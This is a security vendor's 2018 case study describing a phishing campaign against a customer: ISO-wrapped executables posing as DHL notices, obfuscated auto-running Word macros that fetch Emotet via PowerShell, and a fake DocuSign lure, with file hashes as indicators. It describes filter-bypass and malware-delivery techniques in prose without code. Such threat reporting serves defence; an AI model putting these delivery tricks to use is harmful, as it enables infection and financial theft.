Case Study

The Evolution Of a Recent Attack Campaign.

By Perception Point Research
28 March, 2018

How hackers can make variations within one campaign –
as seen in a recent customer attack we blocked.

On Wednesday 3.21.2018 one of our customers received a series of malicious emails across their organization. While it is not clear whether the attacks were coordinated, they seemed like part of a larger campaign executed by criminals interested in financial profit. Our platform blocked all of these attempts before they reached the end user – however had they reached the users, the varying methods used may have easily tricked someone.

The attackers started the campaign with a simple attempt to send an executable file to several employees in the organization. After failing the first time, they progressively enhanced their techniques, adding complexity in order to bypass traditional cyber security solutions.

Here is a brief overview of each step in the campaign:

Phase 1.

An executable file attached to an email.

While sending a “.exe” file as an email attachment is prohibited by most email servers, sending it inside an “iso” file is apparently allowed (specifically in Office365). This requires minimal effort from the attackers and since Windows 10 automatically mounts an ISO file as a virtual DVD drive, it is very easy for an unskilled user to run the file. Once the user runes the file it installs a malicious trojan on their computer.

In the below screenshot of the original email, you see the file name tries to look like a pdf and the email is pretending to be a DHL package notification.

Capture

Similar emails were sent to several employees in a short period of time, all attempting to deliver a variant of the same executable file. Here are hashes of such iso & exe files:

3829238055 ,pdf.iso
5b19f5deb3391ea68bdd964e00ee97d7267bbb7f45cd7af65b67fb7c129f7f33

PO 5302,pdf.exe
960f4c577b0eeb65c157a9d4ca20c0b53a5e1a55f56b7aa75ba35547db676ba8

On the same day, we encountered the exact same trojan files in another customer in which we were conducting a trial, indicating a possible widespread campaign.

Phase 2.

An obfuscated macro inside a word document.

After a few unsuccessful attempts with the first technique, the attackers switched to using a link instead of an attachment to deliver the malicious trojan. Again, the email posed as a package tracking notification sent allegendly by DHL, and contained a link to a fake receipt doc file.

Analyzing the doc file, we found that it includes a VB script macro that is designed to be invoked automatically as soon as the victim opens the document on Microsoft Word. It was quite easy to understand that this macro script is suspicious because it was fully obfuscated.

Code obfuscation is basically a usage of some programming language utilities, such as string manipulations or mathematical operations, in order to hide the malicious code by making it scrambled, unclear and unreadable. Sometimes the goal is just to make it difficult to understand by human researchers.

More importantly, it is used to prevent static engines from detecting the malicious patterns of the code, like new process execution, file dropping, registry operations, and other exploitation techniques.

Detected by only 3 of 60 static engines in VirusTotal at the time the email was sent, this tells us that the obfuscation was pretty successful. Showing once again that code obfuscation techniques easily bypass static analysis based detection engines.

A snippet from the original obfuscated macro script:

Under all of the aforementioned obfuscations, this macro script extracts an encrypted Powershell command, which runs an executable file downloaded from a remote HTTP server. Analysing this file, reveals that this is a trojan called Emotet, designed to collect financial information from the infected computer.

support email

The executable hash is f759bedc1953d63c131d1cbbf641ceb1.
Some of the servers that downloads the exe files are:

Phase 3.

A fake source pretending to be DocuSign.

One day after the previous incidents, the same customer got an email from a fake source pretending to be DocuSign. A Word document file was attached to this email, and once again it had an obfuscated macro script that downloads and executes another banking trojan.

DocuSign

The executable hash is 4598fe6c73be9f241006dfb35a76704a and it is probably a variant of Trickbot (banking trojan).

Quote from the customer.

“Integrating Perception Point’s platform into our Office365 instance was quick and seamless with absolutely no impact to our email delivery service levels, and in less than a month they’ve already blocked a potentially damaging attack that could have easily tricked our users and caused a serious disruption. It’s rare that I see immediate returns that quickly”
James Rutt, CIO/CISO Dana Foundation.

To get a full customer case study Contact Us

Share the joy
Stay a step ahead

Research & News.

Asset 5
Research

Breaking CFI: Exploiting CVE-2015-5122 using COOP

By Oshri Sela & Shlomi Levin

In this series of posts we’re going to demonstrate how modern CFI implementations can be circumvented.

Asset 5
Case Study

Case Study: The evolution of a recent attack campaign

By Perception Point Research

How hackers can make variations within one campaign - as seen in a recent customer attack we blocked.

Asset 5
Article

Attack Trend: Phishing links moving to email attachments

By Michael Aminov, Founder & CA

Typically phishing links are sent directly inside the email body, but now attackers are embedding their phishing links inside an email attachment instead.

Show More
Contact Us

Schedule a trial today.

Yes, I would like to receive email communications from Perception Point. I understand I can unsubscribe at any time.